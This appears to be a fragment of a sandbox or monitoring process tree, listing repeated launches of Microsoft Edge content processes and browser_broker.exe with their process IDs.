C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7588
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4848
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2228
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9636
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5568
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7216
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6344
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1408
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:668
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4256
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9564
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6776
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9308
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5400
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9700
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5820
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9560
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9580